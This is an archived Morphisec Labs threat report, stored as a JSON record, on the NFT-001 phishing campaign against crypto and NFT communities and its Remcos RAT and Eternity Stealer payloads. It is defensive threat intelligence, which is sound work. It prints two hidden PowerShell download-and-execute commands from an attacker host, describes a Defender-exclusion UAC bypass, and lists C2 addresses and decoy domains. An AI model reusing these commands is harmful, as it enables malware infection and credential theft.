{
	"id": "c682899e-ca2f-4ea7-bd60-7af6c8ad5b91",
	"created_at": "2026-04-06T01:29:21.053609Z",
	"updated_at": "2026-04-10T03:20:18.985459Z",
	"deleted_at": null,
	"sha1_hash": "cbab175f5dfdc50f90757570188505dbda67ad3c",
	"title": "Watch Out for the New NFT-001",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 727556,
	"plain_text": "Watch Out for the New NFT-001\r\nBy Morphisec Labs\r\nArchived: 2026-04-06 00:31:17 UTC\r\nA non-fungible token (NFT) is a record on a blockchain associated with a digital or physical asset—usually a\r\ndigital file such as a photo, video, or audio. An NFT’s ownership is recorded in the blockchain, and it can be sold\r\nand traded. NFTs differ from cryptocurrencies, which are mostly fungible, in that NFTs are unique and non-substitutable. The NFT market is booming, with trading volume exploding by over 20,000 percent from 2020 to\r\n2021. Cybercriminals have rushed to exploit this trend. The Threat Labs team now has fresh research on the\r\ncrypto and NFT malware NFT-001, which first surfaced in November 2020.  \r\nThe NFT-001 attack sequence typically includes the following steps:  \r\nAttackers target users in crypto and NFT communities on Discord and other forums  \r\nThe victim receives a private phishing message related to an NFT or financial opportunity. The message\r\nincludes a link to a fake website and malicious app that promises an improved user experience \r\nThe downloaded malware unpacks a remote access trojan (RAT) that is used to steal browsing data, install\r\na keylogger, and other surveillance functionalities  \r\nThe attacker then uses the data for identity theft and to steal the victim’s wallet and other possessions  \r\n The threat actor has now switched from the Babadeda crypter to a new staged downloader while using the same\r\ndelivery infrastructure as before. The new downloader adds increased defense evasion abilities to this malware. \r\nNew NFT-001 Technical Details \r\nMorphisec Labs has tracked several waves of the NFT malware delivering the Remcos RAT since it first surfaced.\r\nIn June 2022 we found a shift in the crypter used to deliver the Remcos RAT. The Babadeda crypter has now been\r\ndiscarded for a new staged downloader. \r\nhttps://blog.morphisec.com/nft-malware-new-evasion-abilities\r\nPage 1 of 7\n\nDate\r\nPacker/Crypter\r\n/Downloader\r\nPayload C2 Port\r\n11/2020 –\r\n07/2021\r\nCustom .NET packer Remcos \r\n95.217.114[.]96\r\n37.48.89[.]8\r\n94.23.218[.]87\r\n4782\r\n4783\r\n07/2021 –\r\n08/2021 \r\nCrypto Obfuscator (.NET)  Remcos 135.181.17[.]47  4783\r\n08/2021 –\r\n10/2021 \r\nBABADEDA BitRAT\r\n135.181.140[.]182 \r\n135.181.140[.]153 \r\n135.181.6[.]215 \r\n7777\r\n11/2021 –\r\n12/2021 \r\nBABADEDA using DLL\r\nsideloading with IIS Express \r\nRemcos \r\nAsyncRAT\r\n65.21.127[.]164 \r\n4783 \r\n4449\r\n12/2021 –\r\n02/2022\r\nBABADEDA using DLL\r\nsideloading with Adobe /\r\nTopoEdit \r\nRemcos 193.56.29[.]242  4783\r\n01/2022 –\r\n03/2022 \r\nBABADEDA using DLL\r\nsideloading with Link.exe \r\nRemcos 157.90.1[.]54  4783\r\nApril 2022 \r\nBABADEDA using DLL\r\nsideloading with Adobe \r\nRemcos 145.239.253[.]176  4782\r\n07/2022 –\r\n*Active \r\nBABADEDA using DLL\r\nsideloading with Mp3tag.exe \r\nRemcos 65.108.9[.]124  4783\r\n06/2022 –\r\n*Active \r\nDownloader Remcos 144.91.79[.]86 \r\n4444 \r\n4783\r\n The malware delivery hasn’t changed much. It sends a user a private message enticing them to download a related\r\napplication supposedly granting the user access to the newest features. Below is an example of the phishing\r\nmessage targeting users of “Dune”—an Ethereum-based crypto data analytics platform. \r\nhttps://blog.morphisec.com/nft-malware-new-evasion-abilities\r\nPage 2 of 7\n\nIf a user clicks the hyperlink in the message, it directs him to a decoy website that mimics the original. There, the\r\nuser is prompted to download the malicious “installer” which infects the victim’s machine with the Remcos RAT. \r\nThe New Staged Downloader \r\n The threat actor keeps the first stage “installers” with a low detection rate. \r\nhttps://blog.morphisec.com/nft-malware-new-evasion-abilities\r\nPage 3 of 7\n\nThe execution starts by performing a User Account Control (UAC) bypass. It hijacks the default handler for the\r\nms-settings protocol and sets it to execute a Powershell command that adds the C:\\ folder to the Windows\r\nDefender exclusion list. The code that performs this UAC bypass technique is well documented in the open-source\r\nrepository. But the attacker employed it extremely poorly—he didn’t even bother to remove unnecessary WinAPI\r\ncalls, such as printing to the console. \r\nAfter excluding the C:\\ folder from Windows Defender, the following Powershell commands are de-obfuscated\r\nand executed: \r\n1) The first Powershell command downloads and executes a plain Remcos RAT (C2 – 144.91.79[.]86).\r\npowershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden\r\n$ProgressPreference = ‘SilentlyContinue’; Invoke-WebRequest\r\nhttp://rwwmefkauiaa[.]ru/bs8bo90akv.exe -OutFile \\”$env:appdata/Microsoft/dllservice.exe\\”; Start-Process -Filepath \\”$env:appdata/Microsoft/dllservice.exe\\” \r\nThe C2 used in that Remcos RAT was also seen in the wild in samples using the Babadeda crypter. This bolsters\r\nour suspicion it’s the same threat actor.  2) The second Powershell command downloads and executes Eternity\r\nStealer which steals sensitive information from a victim’s machine such as:  \r\nBrowser information like login credentials, history, cookies \r\nVPN and FTP client data \r\nhttps://blog.morphisec.com/nft-malware-new-evasion-abilities\r\nPage 4 of 7\n\nMessaging software data \r\nPassword management software data\r\npowershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden\r\n$ProgressPreference = ‘SilentlyContinue’; mkdir \\”$env:appdata/Microsoft/AddIns\\”; Invoke-WebRequest http://rwwmefkauiaa[.]ru/u84ls.exe -OutFile\r\n\\”$env:appdata/Microsoft/AddIns/exclusions.exe\\”; Start-Process -Filepath\r\n\\”$env:appdata/Microsoft/AddIns/exclusions.exe\\” \r\nWe also noticed a variant of this downloader in the Tandem Espionage campaign shares commonalities with this\r\ncampaign: \r\nThere is a similar UAC bypass technique using fodhelper.exe (less evasive implementation)\r\nDownloading and executing two malicious executables (Arkei stealer and Eternity stealer) \r\nThe Eternity stealer is downloaded by the exact same Powershell command as the second Powershell\r\ncommand from the same URL \r\nThough the URL downloading the Eternity stealer is the same, we think these may be two different threat actors\r\nthat used the same downloader as a service. \r\nDefending Against NFT Malware Like NFT-001 \r\nThe crypto and NFT communities are on the cutting edge of financial innovation, and they are a lucrative target\r\nfor attackers. This new staged downloader for NFT-001 is more evasive than the earlier version, increasing its\r\nability to sneak past traditional cybersecurity solutions. According to the latest Picus report, defense evasion is\r\nnow the most popular tactic among malware operators. \r\nThis tactic is popular because there aren’t many effective tools against defense evasion. One such tool is\r\nMorphisec’s revolutionary Automated Moving Target Defense (AMTD) technology, which comprehensively\r\nprevents defense evasion techniques. Unlike other cybersecurity solutions which focus on detecting known\r\npatterns with response playbooks, MTD preemptively blocks attacks on memory and applications and remediates\r\nthe need for a response. To learn more about Morphisec’s revolutionary Moving Target Defense technology, read\r\nthe white paper: Zero Trust + Automated Moving Target Defense: The Ultimate Ransomware Strategy.\r\n \r\nIOCs\r\nhttps://blog.morphisec.com/nft-malware-new-evasion-abilities\r\nPage 5 of 7\n\nSamples\r\n849B58523E4EB0006DA82410AD2792352A97BE92C528FC252B45F84C1F04986B \r\n97AA3C220BC95C83032A2A4597FD463EBA11508347D5D836CEEA4E82588E00D4 \r\nB97FE69C3D771AF4A62B9FBDD5CCE61F9E18D3911C9B3E28C5BF94831F791EF5 \r\n76D1E65F336FA106514B0B618B32D003E8D5340917FB0517A8AF90FC6AFD9BCA \r\nB011F2FAB7414CB794348BA0591042789BA8FE47E002D7FDC165D135A2783172 \r\n7F58D9CE7358A10E0679E36FF7BCF4E51A3DBFA16CE9D8FFD53A2B216773BB54 \r\n80116F648EA5FB431E50A8AA935C168C29D3FFD1E5AA128BD18CE1C167FC8F9E \r\n2C0116126420998B955F7D01666BD0F6AF9DC83FC4E33D7D7B3DD086ECE905C7 \r\nC2EFBCC341A979FD404E51A55AB0436E746BDA35DF2A08F074605FC6AB929797 \r\n568D62692AC0E7667CB925719D2535F548488C96D9B0747CB97DC05FF640A2B3 \r\nA6C9FECEB19F666C483051E77D2DD3D71CD256664B427F96CF778AEE62AB83F7 \r\n030203206B667BB49B24A6E209FF3D27F611A4451687705F7B1E853A0921A788 \r\n8CEDA430ADF0FD37DD732D0903B45ED4141F0786D2A271B58754A6C9D6B68690\r\n46B1A4907BB6B0C021AA223421A2059825A331EEE4CB6BD08E413100337B1609 \r\n4110C49337323EA9D83C22D41A072E28C5B0540325B48A3291C1447488E8D704 \r\n87D57E20A3502F6C4264FC3DA9C671352C30700B0363A331E9FC1E11E8F2CA89\r\nDecoy Websites \r\ncoinstats[.]top \r\napp.perp[.]run \r\nhawksight[.]space \r\nmmfinance[.]fund \r\nilluvium[.]run \r\nabracadabra[.]run \r\nwallet.polygon-bridge[.]com \r\nyieldsguild[.]com \r\nopptimism[.]com \r\napp.opptimism[.]com \r\napp.optimism[.]run \r\ndune-analytics[.]com \r\nclipper[.]run\r\nAbout the author\r\nhttps://blog.morphisec.com/nft-malware-new-evasion-abilities\r\nPage 6 of 7\n\nMorphisec Labs\r\nMorphisec Labs continuously researches threats to improve defenses and share insight with the broader cyber\r\ncommunity. The team engages in ongoing cooperation with leading researchers across the cybersecurity spectrum\r\nand is dedicated to fostering collaboration, data sharing and offering investigative assistance.\r\nSource: https://blog.morphisec.com/nft-malware-new-evasion-abilities\r\nhttps://blog.morphisec.com/nft-malware-new-evasion-abilities\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.morphisec.com/nft-malware-new-evasion-abilities"
	],
	"report_names": [
		"nft-malware-new-evasion-abilities"
	],
	"threat_actors": [],
	"ts_created_at": 1775438961,
	"ts_updated_at": 1775791218,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cbab175f5dfdc50f90757570188505dbda67ad3c.pdf",
		"text": "https://archive.orkl.eu/cbab175f5dfdc50f90757570188505dbda67ad3c.txt",
		"img": "https://archive.orkl.eu/cbab175f5dfdc50f90757570188505dbda67ad3c.jpg"
	}
}